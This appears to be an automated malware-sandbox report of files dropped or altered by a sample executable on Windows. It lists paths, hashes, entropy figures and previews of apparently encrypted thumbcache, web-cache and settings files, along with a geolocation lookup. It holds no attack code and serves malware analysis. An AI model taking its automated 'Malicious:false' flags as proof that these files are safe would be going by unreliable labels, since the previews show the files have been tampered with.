                  SHA-512:7FE5CF33018A9EDFC6CAFA92C3209CC827F4BD7E2142132B7866356C0AC57E72A9FF042C81F58EFFE3D7E2365030DC441E5476A6FA8215862FFEEE12EA04E96D
                  Malicious:false
                  Preview:CMMM .m...eK.....}..I.Z.\#...&.1..hI..V>...r$p2#..^..b....4.B.......N3....L2.z\.....oE...6vH"C..../J.4...+"C->?U...r...s..WN.A.;..uO<...R..y.+...U...J ..+.X3..O4....y..X(w..bi..>...W{.....@.*5?fpp..nC.0....lg.0..~...}.0.F...e.No'..N..0....%.....'.ak...e..~...K..3N..2O|<9R..\b..w.PQAMR..0..V..I..9.O9.`.k#a.-....;.>..#F.%.s...1.2.....uN..u.a..H.S2.*Y./H....i.$....fo.x..<.5T..9.]t.V63......a.J.I.......1.Z+.2..W4...i+Q..4.....^.....).l..3],b.....9.wYp.K...'.".....nw..s.R.`......I...'I..$z...v.4...'R.,g.Wj...oV.;..]p...eT.v;dG...e.S.......Y..;!b<..`.t.[)..k9cd.Q...@.iS.Y&s..N .>C\.b.....?........4.....1.[...SAu..{R..{..~...j.........^...{.Z..m0....z1....'M.J..lJ...i.9..x-;.....~.3.>1.xB*.7.z9.[..,..Lwm..r>C&NI.J..(~.......~S...0.\......V.R....S.U..,..8r..0.....aC..l...J..^..A.k..-.{.9.Y{.\..D....o.Z...5.7uf.M.gA.6..5.m...:"..%.Tf.wy.Qz..g...&.."I....up.r......fT..)G,..Bc.^..;..I.....\JGd....k~..&]P....F.=...p...J.#EiP.F.*pN.s>...T..$....PTw.

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.32841558628857
                  Encrypted:false
                  SSDEEP:6:MmXBvcC2ZfpujP7baWwUVBMh1mL7Mv+R1djl6/ajpUF0oKuFVbOsVolWbz6Wciik:MqBUCkIja5UvEkggHjl6epUOqFn36Wcq
                  MD5:541D8D683A35EFD026E162B3DB50C760
                  SHA1:4A23A0D68ED4EC70E92CD873EEEDA535581CD5F5
                  SHA-256:746A37108C5EDCFF289C307D7CB024F98E19839C18C8E623D64BE0B6883A07D4
                  SHA-512:1A9A992F2CB7A72D7DC392440C5A5356E30FEEBB1DC8387ADE3343904C75A613CA16305C79852CAE39884AFFD51E12C78201BFC23BE60E279281EBB6C86E7CBF
                  Malicious:false
                  Preview:CMMM .....$2 F..]...&.Aw.t#.pL...c..d..$.........k'r........FRy...~..::k...._...2[..a..tz...9'Su.....~.%*......./V4J..h...(.4.cq.m6.:P6..~..i....S.e.K.l6o...u...G.....>29....D"...I.....d+......f*.Y.J~..Y..f.....7.j....z).J.._E....R.....$J<......60......~.....Ai0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.240100738160811
                  Encrypted:false
                  SSDEEP:6:kiu6r/4dYBcBeEINP7Ly7x8u55FyuMdbLo30Bk9W/mvFdG206P8dOsVolWbz6Wcq:kRdYcetNPax8u55F0fC4S50xn36Wciik
                  MD5:3A2B7D087CC8625771DEB1E550BCBF29
                  SHA1:647161A6B4B469937C7001B5AF2FDF111A6F1CCD
                  SHA-256:EA5BF554FD9B50061F8F240299F39FEC6510CCD872C26B82B1D94A498594A040
                  SHA-512:1178D802E5E3C469F997A21922227C0FB5620C8E388AD1A538273F7F0172775E7E00A7D45E901001F1BF641048F5931E80080DE6952EEE8880738BCD6C2EDC09
                  Malicious:false
                  Preview:CMMM Q.V.jo.._.......g..<....|@7.+b....!.>.*..bH..........<.R.h..e.N&Zy...O..o..:...Njn.n.9S...Y..u......$^v......M.....uK.Q..V.x9:.D.<.......zm...uv.U.+`.T.3Y.cE...u..QZ.....fMt..9-.?X..W..^.:...)x..^.$.+.C.-.4K....J. .2n.gV......."_......#.~C..~.Y...8.^.f.o}B.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.304428584883196
                  Encrypted:false
                  SSDEEP:6:uTDT2pYk/CTVhK6CsD1CkOFhnx7mryjvfruDaZoqS6U1rwm9MRwROsVolWbz6Wcq:u6Yk/aD1CRFhx7mryTgqA6URwvCD36WX
                  MD5:334490224943C71A65B8985795C0CA66
                  SHA1:BCD965555CD5B0775520E7CE3D9C226B6D212273
                  SHA-256:C700F29E24F7A456B1051A1DFCFE1D952B29F17D7343A7C086D35E17689CB98F
                  SHA-512:4BFC5BD68B69E5AC431DD8F81B5BCA098BC54BF524FA739D15820E7705F8AECA58B21F4BC177B7EB5C50F20379E0381685FA5F8CA58A4D24A03EC0BE3E2DE846
                  Malicious:false
                  Preview:CMMM vY.e.>p.q...IphX....$L'*.>K..=.I.B\..........h.........".<.t.N....O.bd....T...=...X....W.#&yk.3'...3...I..L.RA...Z.DE)1..E...F..Q..R.&.=...g....O..2...h...n...-..U.lS..g5i.\.'.RhNcH..R|...../T.0.C ....5_;.K...d.d....5..^....#_.5....%}...{.2.....o....\4...2&;><..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.277234904733729
                  Encrypted:false
                  SSDEEP:6:BSo7IQfH0/NprA6UVQEE+jvmEN3n2yQAo5Camy/D1BOsVolWbz6Wcii96Z:97IQfGHU625jvmEN3n1QHcwF36Wcii9a
                  MD5:0BC68ABA6E1D1D62D3FDF75A90133254
                  SHA1:84EA551AA60181CE1D309A05170C023484E7E849
                  SHA-256:AB23BB081FA95DE63F6091604A0B016E840483A663F6FDF41B75E6AFCF47460E
                  SHA-512:307F7FB6D5690AA0332BABDD209BC99748E59737D5EDD8A6203B7E9C0BE8EF832ADC5F2957C5753213D362FCE4B9EC8F56861E58900132663C89F49BD41ABC13
                  Malicious:false
                  Preview:CMMM ...Y..R....yu.Jr.K;....S..Dp?...9.s.=....?........=.x...wp8.k.r2n.b?=@@....v.....~.&..K'..N..].6....M.D..Z.yQ...%R..H......R..1>.0.9.....i.A...@Oq2..eR.C;[d64.\..6.zL...@*.}O.,...R8O....e%......niI^.0>h.b...{wV#...h....e.J'Qb...H.n\....s..!...eT4...xc..N.`AWi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.294039408730942
                  Encrypted:false
                  SSDEEP:6:C+sfCdJOZ9JhaSZzLH5YXFVKRi17aFR8lb89o52rkMqfyUE71BOsVolWbz6Wciik:xsfCd4a0eX6REaibj5Drix36Wcii9a
                  MD5:277C0908CDB857DE1439D9E22A7B3F18
                  SHA1:0FE9BC773ECB0301DA81682FBFBFBA2931A7C425
                  SHA-256:7D967E7C0E647D296B5B4EABEFD3284CAAD5D9CA874FF700DE1931CA94DA8007
                  SHA-512:1C0A4958A2BE21A57308AEE24C439CB7BB44645FB55628766998C7B57918792765AB7CF12860F12009F23A0E43B7CA99CE74E6132328EA7515B509A2E89C498C
                  Malicious:false
                  Preview:CMMM ..z.>I|.2...P.......=g{.5m@.....v'|......[.6..|...8..Al....I.....5.S.9.}..x............of.u).q....#E...H~..z.....K.a.v...%..Q%x....de........m..aG6Tk..s..J..|..3....8...O......&.J...H..._.."r...j`..O....Z.BdprP.i6..B....oR.N'...O4.m...2U..<..N..\..c{e....L?..Ci0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\geo[1].json

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):411
                  Entropy (8bit):4.6420780896559455
                  Encrypted:false
                  SSDEEP:12:Yd9wpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdgHD+CtrRQVctrRQVzRZQ3htrRQV/m0
                  MD5:EDCA7C5EAEC41C2D1880B6161721C8BE
                  SHA1:9A650E1C3E6B7E8858A48D55F21C10C99EBE8AC8
                  SHA-256:CADED2E85735BEB1518F1C907BB108B1DCD9C481DAD682B7E0A8E1009C541065
                  SHA-512:2C39E15ADEAC90FB6D8F5F87B384F86A79E15F0582A4E8618C264FEE7223958E2F51AC5FA60001F95AE215351B677D91718E551DAB655B14F532556CC2D6AA7A
                  Malicious:false
                  Preview:{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):1.5
                  Encrypted:false
                  SSDEEP:3:Nv:9
                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                  Malicious:false
                  Preview:foo.

                  C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64281
                  Entropy (8bit):7.997621742266017
                  Encrypted:true
                  SSDEEP:1536:NpnpRZEQDnGp9yi1c+85kYxOhXSX+YfzYFxeRsOpPJ7H:bnFEQDGp9v1cTa6OY/bcx0px7H
                  MD5:AB02FCDAE1C04070CA3685D15EE1065E
                  SHA1:FAD3CB9257F1BD586385B52780F8A242FDC41044
                  SHA-256:041E7283845F1AEF1D202DA64F9C0DDD68F97C02C1757CCD3EB8F6982A6D2386
                  SHA-512:53172B2137880B6D881CA800443CA8E339E9D6F3296C3D2EC9320E02A85FC5C17BC31AFB19434B0C7B70FB2F8AF8E717EBC7004212E21F2CC28D17B1C4F637A0
                  Malicious:true
                  Preview:<?xml.&I.&5..e....^.........E..R~p9.Z....>l.e.yCY,...p......3..k. .W.y...H..@=...O.'.B.....Yr....<??k_....4,h"v...]Nu....c.T.......E.B.CP....].........V(..*....j.7E$A..w.....}..H!.l&.aK..P.b..._.....m.5..jp.E....W.ZqXA"~.....&.e...7FO.\.[.....X.y..1...R.#=C...-op.X..9........)noP..!.f.:.T....[8...-.t.{2H......U.B...R..1#...'.O..1.X..kq....?m.f)...;.d.U@Y.][..].m...LR...*..FA.W.kD.....:..[...H.....;"\2R(...8....G..2Eu|n.6.E{....~..t..cOl2J...i...Y.E.9.......u*.V.U.c:f+32.;/.....t:..........~... )'...H..n.T.....!...*..@..z.x1....)....hA.0..?3D...C....>......3...!.Nt..>..f.6.......A...KA.......m.1......$7.....2.....,.pDqv...fO.Y.0Z.._)9~O.A.bVyh)T..O....i......gK.3..N.BA..g6......%^\.R6....^..g.sF..l.@.ww....+.....a...,...V..G.*.F..\]..[3.c..@.+{~.u......hwT.P..U.:...o(.i.|...*..>.}..DG.......z{..JO.'.G..).y.s=:~....."\..y.[.._.Yc,.....[..DDL..4.Y.f..f-Y9..B!....`.+B.8.ae..HW<..J.*O..o&....0+U...HLy..7.....U@..p.k.=.p.[.ty....".y.

                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975560537200802
                  Encrypted:false
                  SSDEEP:192:CRzQI9ewkOQNJ1XnDzyNJzxZ9MQ/xtShc2znwO7D0+1xR7nm0NinVH:e6LNJ1XnDzuNFZ36nwYDhx2VH
                  MD5:669CE2B3B4767819465B232CB731D449
                  SHA1:E23B212660EF367E9A45D79BAAED2B92586F9408
                  SHA-256:891BCC6CCA2B37B473EDF88AF954FF848D790F7DBDF40948BECC9BD8322B9F2E
                  SHA-512:A781ABB488D3DFE6A0F09295128E8DA69D9753004EBB3D393741B579328411DA2226ABBA2E9919FCF7573F01C13F42E7B3A0F1F6F6365C0534A245AEDEA02CC2
                  Malicious:false
                  Preview:.p.|........ .).NVb....k.%.;.i......9...^.u.Af(......>U#..36P.....~%) .r1 ...N.-.'..Z.!...v].....Y..g;.....&T..V@=|.........M,)....6.j.....K....?..l./..H......ay.....A~...(....Za...ehWtV..8.}P.......[%..^.r..F..*..rxo.........3...k .`./+..T......rU@fKj..Q.X|...4.N...m@;..n...D.[..9..#.Byz...6...L..D..H*ep.R...F...b..8u.3..7~M9.~df.0...b.8g.R...I.t.......H..-..Z}-............?...P{.y.*$.91..`..O.WF}......e.....)..b...p.8.7@......G.tX L\...`.E..5..HJ...W*`.[...7.1[.....3.."..R....6v).q......c.D>........So...:G..^....:4U.~m.V.GrM..R\.O......U.p.a........I................"...d.f.,dI....0.bei..A.|..ecDppZ.5.W...}.p'...G3.f..n$4.^....q..S~.......W6.r......_.}...~}...H\..C@,..P].h>.".h._...U.G!......X.b.D....J...GC.....E.....{.-.|p.......a.%.1....^...H..#%43.o..n...w+.g......`..7.V....Q.I..m.....4...Y..E=g..oF.K.v....A..<R.'..;Hv........aD.....a.8i..B..K8..."nh..;...O.s\....y...w.H..qr.#.e>U.H..i._...."..t.T..?.#...|...*..b8..U...i9.ht.W/5$D....O..

                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V0100004.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):7.012358618276437
                  Encrypted:false
                  SSDEEP:6144:Iy1MoligirXV2+kknVTlBcmwBJeQNy6tsM0P8ATX1BK8O2Jzy:I6lig2o+ZnHBnyyg
                  MD5:7291D2B28FD52382F66319FBB82A786A
                  SHA1:C970F6E1B0238B93DE18F5D3DEFAA8C621F3B76F
                  SHA-256:14AC6DAFAC11CFF1D8CD1E6F0DD6D4E0B0B3FB7BA810339DB6589BF296E079BB
                  SHA-512:8B42F3F3F24D9931CCC77A071E764DAAF99A5E1EA4FB11A38AB694BCC58D64B8BA48B1A746F92D5181511537778E213F06C59B52EB821B99AF725C9399701E8C
                  Malicious:false
                  Preview:w.I`...9.H:-|<0.z.s...&.\..k.}j........a+.7.pR.*........b......M9...8....y.J..z...;/..!<J.... .*. .d....%...|....}.....C...$.Wn.9.>R8e-:h...H0.L.~^DX.O....-.V.w<..q.rhm.4...!...6..`.,T<JA:<.....a<......W.v9s.50..'....N;..@1G....I.E.....3..F.....o.y].Wu">;$F..c......Q.!.\#3....!B..Y"..j900.t39R.$..... x.....# .e:...f..Bl...*.P.a...........!.w%...R....Jz.3K>.A....;l.K....b...%.a)8az(.....'..3..S..EO..>..I.+......7.be5....o...2p.].E.V.d.,./1.d..{Vt:Ve4...R..]......Hh6.&........M...c...#.F.2.,.W.2.;D..q.r....\....C...#..bt..d .\R.)v.:..)On.q..m.z..~?.=....a.~FS.........A.P....~.uCr.....#$......N.u.{.co!.....FK..N.r...5z...GWW..mY..jb../..r.I...}....(....z.T....L|..<.WTYj...MK...Y.a<81........*..X_.rq/..P%.1W..-.....p..e...|q.O.[p8..2..q..3.m..s1J.].A..LU.....t.s...k..j...5T....4.{...-l.QK......_x.Z..}..........I@Cj$F.;..Q..... ..rd......"...}.W.cY67...F.n........f.q.T....}..hR@.n4.'..\[.C..\^t.............).....P.....u9...$.....`...

                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00001.jrs

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.208075888208003
                  Encrypted:false
                  SSDEEP:3072:ehuof9S4pwyA6kjOoQHx33ErK5eXFmIft5PbbtGA03s5MGlQKUR1h:ehPWyAHOLkrK5eYIjjbj0852vh
                  MD5:81306AA20ECAF3AD91322BC1B1A2AD3A
                  SHA1:A65AA4C2C4BEB7B51C0318AB56B0BE6A3486C210
                  SHA-256:819DC540624E110C36CE185DE863409D29D80191FE25C11537E6D00E24F56C79
                  SHA-512:9116AE298B4BEE88DF34DFB913CF1FB30653DF926B3A99D5FBDA049745962DC132290590DA9CB691AA5F17AF05D8D8BD70ABDA4909EEFE919DA5A154DEFD0CB9
                  Malicious:false
                  Preview:........'..?..(l..........B..] .{.......%...J.z|..S.........x..>[..-...B..W.V........$v...F....OUI..DTFR.....(,..X..63'#.y..3.....'..N..Aq.a.X4..#.\.......57.U....y..?.V..@oR.s.c.l...].N...;... ==..2c<.0.G..R=&.o.E.K.zJ......\+....~.....z.@d..7Y.......././......1...v...W.&z...,@h.g..27k3.[.5./...t.n....dl..]2.....S.:...........=...1.y&......N.j/..~".At.+.....'#n"..8..w.]..P.21)...%............}...;.<9..T...Y....M.>.....$W.../..v.......,^.p[g.F.X.d.^V.W...N.dL.[...J..:P..7$L..H.O8)Z.*....8.A...D..]o.WO[........pY0,...W\..'...O!..Q2r....a.6.dH...E....2..a.U#..*.n%.. ........(.f.....4g....:..Y......O.....hE..n/|..X..%w..w..Iz.3.$...X....n......}...<}..6.8...;\...5...)....<R....:v.\......ds{0m....!s..CX.".a9.n.....y..~.Bp.B......?...Aukuo.1= .a.5\.2c..y.PY......+.. r/.clbC=.2a....+...;b.....E...*i..o.(.......5.ND)F....W.Q.5!T.mk......... L..R..P..*....Mv.*Q|X....f.G....J....;./.E.!wy)w.h$P.0.V.F...G".i. x..::3....gm.......?.!..Uz....a..xL..w....

                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00002.jrs

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.207051396112078
                  Encrypted:false
                  SSDEEP:3072:U9tdHvJDPW2+I/6lVOwTBqYImm7Nh3DYLIig7PedgxmSmhBrKAwFaf:QPe7I/6bPImmLAIi/2mSmrrK7af
                  MD5:7500A8656CFF36127908862B7ED507B1
                  SHA1:85F382E12B5C2363C13A0D495856A58DBCA4C3DD
                  SHA-256:1D70C7CDA03DD44C11E232F5D46B97EEC0A0DB695672EAE587A5FE0849A1A31B
                  SHA-512:34EA4FDE2A27AEED6ADA7E3232CDFC78ED64AB1183265348E18E48E5DAE3804120F207DACF2FDA0834D57AA8935A938B35073740C2BC9BF7FA17EEF747FACBCB
                  Malicious:false
                  Preview:.....at$..t.4liJ....".h....L.dl~~.J...P..n.............K%.m..:q..rI...".%..t.W..-r.E....}.E&.I*wO........[bKE9...e.R..2.4D..].F..F..6.3......v./...|p5;M.G.8]4...n..@Gs..u....*..u.4.......x...W..$%..(4y+..'Bg.X.}..-.:..6..H..4.)4..-[..;F...K.3.....{.b..!K.'..&...,..?@ .l.%.......JyW./......[}...`..&..G...=.ID.C.h..a.3s~.O........s.+...HX.wk...=.|.u]..lZ.../...?..H.....|.\.3..*.....".?..m.1;UH!...)2zR......&.V...O=.>.-.w.S>%hH^..P..._.C)p.]i..c.P\..._qa....3...l..@".`.3....z.m.}_.k....+.c.....j#?...F..'*..0+.......{.6.C.!.......~..../.s..."..h.B.~...~k.h..t.>;...n.&...+.}.....W.m ....]......n...L.o5(........2.........C%2sR..........&P.>.j..{..r.Drr...c...@.e@..Bh..O...J..1Q.<.G.u.v.i.H.~.]af.2%&2.8..wH...w...~........4...5..W.K.*..Y...3.#."l>.K...(.t?:o.j.S.|..Bg....#.c.x.^...}'[..8}...A....D_..v...vO.m.t5s.!;.m .Q.....m..#;.Evi0`....M.B..T)>.......h..+l.....Dg....Z"6.....[.+......J...B.2.,...9..W.P#.".ptz).........}B..Z_.]p".R.jB..3...

                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):6.665508136536217
                  Encrypted:false
                  SSDEEP:6144:veN1IKXgks9V+719PNYqODlnOK0eBQ6GuwlcTKcBwqGQguuleoxvTxcZxBvxdhv/:aJgks9C1FNYFDlnvglttEjx/
                  MD5:64909FF32120097203C19048956927BB
                  SHA1:601CA1AB12CABB5372948330AC8BA262F614F7D2
                  SHA-256:805D3B091216F7F6A38A9E09EA246C7CE1E8D58FA0D93CF277773D5C76A94024
                  SHA-512:437ED8F93C0FE95C468E83692835F1641C45B51F70D6701ECA7E9A0B6372FE3829474BEDF8B304869B10126E5525F87FB76F6526701D977F92012E3296112978
                  Malicious:false
                  Preview:.....k..2A<_!K....; ..\.H..\;...3.%..f`.."...........2..&.0....Wi..*...}.cS...u;d.........p......|...j*r.M.D.5B...\...9....$+.34z...v.../....t..<")>;.o`.D .....7...Y#...IC....{....l&..b.&DX.~F..9U..=5.i.T|Zp..n&......?...a.Ga...v`7.6.m.]......u.gOt[..+..g ..n.%..i"j.*..m.....Wu>O......p....)..Q;.P.W....&_.."..&.3..J.J.R....@..tl.8.4G.._..$THW.Y2y..vR...d!./..X..v..n...3...?=...b.,..K...:?....!.....x..H&o+mB..>.....]`...).&?.8..*.R...0.Iz..[.."|5..._}.!.c.<.....yi=..|)RZUM..x.2s^0t.......n...i..Y..=.......T..$.q(..._...X~...Z7v.C...N.x2.u.a.......:...s..hT...`..S..J..8~._.w..\....P..d.[....E.^..}...............R....7*.?.7.. W<.."..R..Q.....1t}.......5....?J..4.E.-W8.kA.l....R....0T.P..........~.a...)c....3..v..S.p....@...^.g.Y...d<..Z.f...BA.ro.....A..N.?....{..S\..k.|..MS..b..i..{......Q..........Dnm.$....:..I..WOi.....$....|..J...|S..{...?~.........Xg/&....p5V.m...'9.v..[..Z..u=IOS..w4...K.o.I...V..Y.,..|.9.......$(.;t.b:N..#..3..P

                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975539813573799
                  Encrypted:false
                  SSDEEP:192:KBJkXiGuht5fabpDnHuSFe51BbBx8aUSinc4U:3D0tBalHRFe51BbBCwXn
                  MD5:1D7053BDD9B54E98FBB1A2BC697AD5F4
                  SHA1:1541E99F962A4CCC0A0317872A83CF125DD434B8
                  SHA-256:587623B49FB012356B6CABC6D41A4F5B1A179B7CCE8C85CEF88B5CF86AEDEEAB
                  SHA-512:6ABD1ED10C3A18BCB66F9E6D1130A3A4180B842D7226CE77661901E6AD299544C08D30092058CDC5039E40685BC20F46C7D5C7F77BF858ACA97954CF95C79F84
                  Malicious:false
                  Preview:regf......C".!..|mJ....M.].roif...|.../F]...uk... .P...gH.q..?......6.Y.e.L........?g.N..4M...^.*..&.......%...;.N.(X..4,s.m........'......^W.?...h.....p,..+..p.n.~A1....U..PD.9=.. ..Xd."L..|.7d...'.N.a.o...%.n......[.@Mny.wL...7...r......y..... .`BA.w6....t. ..QxD......+..-..C<~.k.vOYt&..`..CV...p.ef...Tl.R4.:;yA.....h.7..lE.D....:1...(.\i~e..FT..D.T.6..+.Q.....F....E..4.1Z..K......i.7TC...nD|.j.b....&........j..4........dp..4.N.{.sc...>...%...E#..}..s.=....Q.@.T.Y.O.q._..g..G..v.6.....+ <. .....p..P..........#......S#....d...c....zw.S.76.)..-...L.c..R.H9..)O.X.....3....0..i......w.o{:u1.By.:xp+l.P.a.. ..V.L.3..........m....C!..u...i......_....J..:...s.N..T]d...%...a..g..x.....9....h.g...g..T..mI}"..@p[\.....O)hG.Cb......hi..l![[.4.}..M!d.4$.]`,*E.P.|.T.RZ&h.!.*......(.0ev...%..0..x0...a.Y..._.;........2..7X...Yp...Wd.@..t..W:q.B.Ap...4.z.l......t...$...K.Q.`...B..`..8.}...{.z.%....(.4S|...$z.t..v.hI..&. =;0..Rk.e.P..SE>X.%.>.

                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979372438142767
                  Encrypted:false
                  SSDEEP:192:KykJJLpRPhZVM/R1a/+041EJosoZV+Glny3W01UzA6ZlKTjPZw8BbTnjvp1cd:MNRPhiR1a/+lESZzy3BxUlaw85TVW
                  MD5:26AF68CF5A9A4CB7A75B47BA2B9CC25A
                  SHA1:7AD91F209E867ACA584FF71004277A754FB6E80D
                  SHA-256:0D9F42FD71C0624A1715E3EF7D2DBB9D49FEEAD9CE2F2C2BF74319975E637A1D
                  SHA-512:8642D7546F2E68D991AC48D9E4EE2D292E0219C0E379F4162AC2602B62DF9790AC12CD18DBFA9E24B5446E05F570594961FCF049D16CE10DEF32C1FDEF9F4135
                  Malicious:false
                  Preview:regf....Wt.$U@8Ja....`*#.hNc.P.....H...V~..~9.......4 .j8.i.QV.C.7..~g......iV.zL..........*^.#...R-B/[3....7..}.+...Q..%{s.Z...,.n3...(X......31.\.....p.-7....#......Z...p.C6.H..vd ....R.....1WVb.....>Sx...n'..{....N-....O}.....swui..&X.3(..H_4~.. P..d.m...;_.!..1...(.I.H{d.,5....#....+...1.i.n_+$,...7.@N.T,..S.J..+(....Z8..C..P...m.f9..U?..YL.nB.....?.b..i.oso...dl..#7.lEhA7.j.+..%.F...5;...s.....].@I.._....v...4G.o.K..BZ....d...3...r.........y.r...}....<.H=......7........h"O..wa......*Br3....W.9..i.......9........W.....[ry.|Q.W.....F..5...@.z}eE*....G.L5.../..=.K..|.:`ul..R..z.G...........M..E.......Ok.D...T5.....s..{.a..M0.6......OIS.9.....Mk...$....ID.4Fe.b...93v2.2..5....0...v......w_..I`R.D]t.T..P...`?...ES...`.:..............u..p).v.-...K..._'..T..7..!......y.&i...3....".X..J..W.Qv.?.'....f.~{....\...Y.yg...~".9..xM..j..)*HH.~\...tt:p<...#.wE..)....S4......rX......&.f.....u..P...?..5.P4...,<.d...z."B#yC.1f.E.H..f..tY."..r;-..K5..tJ.

                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97912956412753
                  Encrypted:false
                  SSDEEP:96:ZAg/InIRl+F+nc7Te9TEJHkfZ0oV8e4xW1X9WQ/Z49RrpZx1hi5w07LgCGLdJWHm:+S7bedInYf4pu9T3i5wkz4d0nhtEL8LU
                  MD5:73FF556428A89DCF00A856790336ECC6
                  SHA1:DCEBE21646A94D6A3F77576BF70E3FD3EAB2C0A5
                  SHA-256:04FA55C0BA0E717E437C62DB6DA9BB4C4C4F183568DA1BCE5F221A4B92F464D5
